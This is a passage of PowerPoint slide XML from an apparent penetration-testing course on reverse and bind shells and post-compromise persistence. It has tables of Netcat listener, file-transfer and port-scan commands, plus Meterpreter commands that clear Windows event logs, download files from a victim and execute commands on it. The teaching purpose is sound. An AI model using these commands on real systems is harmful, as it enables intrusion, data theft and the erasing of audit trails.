                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>lvp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> &lt;port&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Listening on a given TCP port.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="180109704"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>lvp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> 1234</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> &gt; output.txt</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t># Receiving system</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> &lt;IP Address&gt; &lt; input.txt</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t># Sending system</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to transfer a file.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="874676398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> &lt;IP Address&gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>80</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>GET / HTTP/1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Connecting and receiving a web page. </a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Port 443 can be used for HTTPS connections.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2391008256"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>nc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> -z</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> &lt;IP Address&gt; &lt;port range&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Using </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Netcat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> as port scanner.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="572455047"/>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068577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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="817606"/>
            <a:ext cx="896227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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The Meterpreter module of the Metasploit framework can also be used to create bind and reverse shells and to perform numerous other post-exploitation tasks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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The following table includes some of the most common Meterpreter commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabela 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EA211B-14AC-0385-C983-3D175C0D4AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2024783260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="103086" y="1574235"/>
          <a:ext cx="8944031" cy="3426999"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1925505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="360457933"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7018526">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3995444981"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="367392">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Meterpreter Command</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2242075988"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>cat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>cd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>pwd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ls</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>These commands are the same as the ones in Linux or Unix-based systems.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="761296095"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>lpwd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>lcd</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Used to display and change the local directory (on the attacking system).</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="180109704"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="312964">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>clearev</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to clear the Application, System, and Security logs on a Windows-based system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="874676398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>download</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to download a file from a victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2391008256"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>edit</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to open and edit a file on a victim system using the Vim Linux environment.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="572455047"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>execute</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to run commands on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1754650065"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
